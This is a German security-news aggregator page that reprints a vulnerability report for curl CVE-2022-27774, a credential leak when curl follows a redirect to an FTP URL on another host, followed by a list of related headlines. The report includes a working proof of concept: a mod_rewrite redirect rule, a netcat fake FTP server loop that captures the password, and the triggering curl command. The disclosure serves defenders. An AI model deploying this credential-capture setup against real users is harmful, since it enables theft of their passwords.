Cookie Consent by Free Privacy Policy Generator ๐Ÿ“Œ curl: CVE-2022-27774: Credential leak on redirect

๐Ÿ  Team IT Security News

TSecurity.de ist eine Online-Plattform, die sich auf die Bereitstellung von Informationen,alle 15 Minuten neuste Nachrichten, Bildungsressourcen und Dienstleistungen rund um das Thema IT-Sicherheit spezialisiert hat.
Ob es sich um aktuelle Nachrichten, Fachartikel, Blogbeitrรคge, Webinare, Tutorials, oder Tipps & Tricks handelt, TSecurity.de bietet seinen Nutzern einen umfassenden รœberblick รผber die wichtigsten Aspekte der IT-Sicherheit in einer sich stรคndig verรคndernden digitalen Welt.

16.12.2023 - TIP: Wer den Cookie Consent Banner akzeptiert, kann z.B. von Englisch nach Deutsch รผbersetzen, erst Englisch auswรคhlen dann wieder Deutsch!

Google Android Playstore Download Button fรผr Team IT Security



๐Ÿ“š curl: CVE-2022-27774: Credential leak on redirect


๐Ÿ’ก Newskategorie: Sicherheitslรผcken
๐Ÿ”— Quelle: vulners.com


image
Summary: Curl can be coaxed to leak user credentials to third-party host by issuing HTTP redirect to ftp:// URL. Steps To Reproduce: Configure for example Apache2 on firstsite.tld to perform redirect with mod_rewrite: RewriteCond %{HTTP_USER_AGENT} "^curl/" RewriteRule ^/redirectpoc ftp://secondsite.tld:9999 [R=301,L] Capture credentials at secondsite.tld for example with: while true; do echo -e "220 pocftp\n331 plz\n530 bye" | nc -v -l -p 9999; done curl -L --user foo https://firstsite.tld/redirectpoc The entered password is visible in the fake FTP server: Listening on 0.0.0.0 9999 Connection received on somehost someport USER foo PASS secretpassword There are several issues here: 1. The credentials are sent to a completely different host than the original host (firstsite.tld vs secondsite.tld). This is definitely not what the user could expect, considering the documentation says: When authentication is used, curl only sends its credentials to the initial host. If a redirect takes curl to a different host, it will not be able to intercept the user+password. See also --location-trusted on how to change this. 2. The redirect crosses from secure context (HTTPS) to insecure one (FTP). That is the credentials are unexpectedly sent over insecure channels even when the URL specified is using HTTPS. I believe the credentials should not be sent in this case unless if --location-trusted is used. It might even be sensible to consider making curl stop sending... ...



๐Ÿ“Œ curl: Credential leak on redirect


๐Ÿ“ˆ 38.19 Punkte

๐Ÿ“Œ curl: Buffer overflow and affected url:-https://github.com/curl/curl/blob/master/docs/examples/hsts-preload.c


๐Ÿ“ˆ 32.64 Punkte

๐Ÿ“Œ curl: Credential leak when use two url


๐Ÿ“ˆ 28.53 Punkte

๐Ÿ“Œ curl: CVE-2023-23914: curl HSTS ignored on multiple requests


๐Ÿ“ˆ 22.94 Punkte

๐Ÿ“Œ curl: [Critical] Curl CVE-2023-38545 vulnerability code changes are disclosed on the internet


๐Ÿ“ˆ 22.94 Punkte

๐Ÿ“Œ Credential Dumping: Domain Cache Credential


๐Ÿ“ˆ 22.17 Punkte

๐Ÿ“Œ curl: Invalid write (or double free) triggers curl command line tool crash


๐Ÿ“ˆ 21.76 Punkte

๐Ÿ“Œ curl: curl overwrites local file with -J option if file non-readable, but file writable.


๐Ÿ“ˆ 21.76 Punkte

๐Ÿ“Œ curl: Parallel upload hangs curl if upload file not found


๐Ÿ“ˆ 21.76 Punkte

๐Ÿ“Œ curl: error parse uri path in curl


๐Ÿ“ˆ 21.76 Punkte

๐Ÿ“Œ curl: curl "globbing" can lead to denial of service attacks


๐Ÿ“ˆ 21.76 Punkte

๐Ÿ“Œ curl: curl file writing susceptible to symlink attacks


๐Ÿ“ˆ 21.76 Punkte

๐Ÿ“Œ curl: Proxy-Authorization header carried to a new host on a redirect


๐Ÿ“ˆ 20.54 Punkte

๐Ÿ“Œ curl: Certificate authentication re-use on redirect


๐Ÿ“ˆ 20.54 Punkte

๐Ÿ“Œ curl: cookie is sent on redirect


๐Ÿ“ˆ 20.54 Punkte

๐Ÿ“Œ Medium CVE-2019-15115: Peters login redirect project Peters login redirect


๐Ÿ“ˆ 20.49 Punkte

๐Ÿ“Œ CVE-2019-18451 | GitLab Community Edition/Enterprise Edition up to 12.4 Internal Redirect Filter redirect


๐Ÿ“ˆ 20.49 Punkte

๐Ÿ“Œ Lepton CMS 2.2.2 logout.php redirect Open Redirect


๐Ÿ“ˆ 19.32 Punkte

๐Ÿ“Œ Kabona AB WebDatorCentral up to 3.3.x redirect/non-validated Open Redirect


๐Ÿ“ˆ 19.32 Punkte

๐Ÿ“Œ Pivotal Cloud Foundry Runtime UAA Logout Link redirect Open Redirect


๐Ÿ“ˆ 19.32 Punkte

๐Ÿ“Œ Piwigo up to 2.9 identification.php redirect Open Redirect


๐Ÿ“ˆ 19.32 Punkte

๐Ÿ“Œ Furikake 0.1.0 on WordPress classes/Furigana.php furikake-redirect Open Redirect


๐Ÿ“ˆ 19.32 Punkte

๐Ÿ“Œ 301 Redirects - Easy Redirect Manager <= 2.40 - Authenticated Arbitrary Redirect Injection and Modification, XSS, and CSRF


๐Ÿ“ˆ 19.32 Punkte

๐Ÿ“Œ WolfCMS 0.8.3.1 login[redirect] Open Redirect


๐Ÿ“ˆ 19.32 Punkte

๐Ÿ“Œ Ninja Forms Plugin up to 3.3.19.0 on WordPress step-processing.php redirect Open Redirect


๐Ÿ“ˆ 19.32 Punkte

๐Ÿ“Œ Premium WP Suite Easy Redirect Manager Plugin 28.07-17 on WordPress Log View redirect-log.php GET Request cross site scripting


๐Ÿ“ˆ 19.32 Punkte

๐Ÿ“Œ GetSimpleCMS 3.3.13 admin/index.php redirect Open Redirect


๐Ÿ“ˆ 19.32 Punkte

๐Ÿ“Œ QASymphony qTest Manager 9.0.0 qTest Portal /portal/loginform redirect Open Redirect


๐Ÿ“ˆ 19.32 Punkte

๐Ÿ“Œ BASH Shell Redirect stderr To stdout ( redirect stderr to a File )


๐Ÿ“ˆ 19.32 Punkte

๐Ÿ“Œ Pivotal Cloud Foundry Runtime UAA Logout Link redirect Redirect


๐Ÿ“ˆ 19.32 Punkte

๐Ÿ“Œ Moodle up to 3.1.1/3.4.8/3.5.5/3.6.3 Upload redirect Open Redirect


๐Ÿ“ˆ 19.32 Punkte











matomo